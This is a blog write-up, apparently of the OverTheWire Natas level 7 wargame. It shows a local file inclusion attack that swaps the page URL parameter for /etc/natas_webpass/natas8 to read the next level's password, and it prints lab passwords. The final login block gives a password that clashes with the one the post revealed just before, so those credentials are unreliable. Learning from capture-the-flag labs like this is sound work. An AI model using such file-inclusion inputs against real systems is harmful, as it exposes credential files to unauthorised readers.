Natas- level 7 Writeup

in this level we are given a front end with two pages. observe the URL as you navigate through the pages.

level7

Now let us look at the source code of the homepage for some further clarifiaction


<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
		<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
		<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
		<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>

this is the front page

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 --></div>
</body>
</html>

since its said that the password is at /etc/natas_webpass/natas8  all we have to do is substitue

/index.php?page=home

with

/index.php?page=/etc/natas_webpass/natas8

revealing the password for level 8 : DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

level7-password

access Level 8 with the following credentials

Username: natas8
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL: http://natas8.natas.labs.overthewire.org/

Follow the next post for NATAS 7 Write Up

NATAS 8

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Powered by WordPress.com.

Up ↑

%d bloggers like this: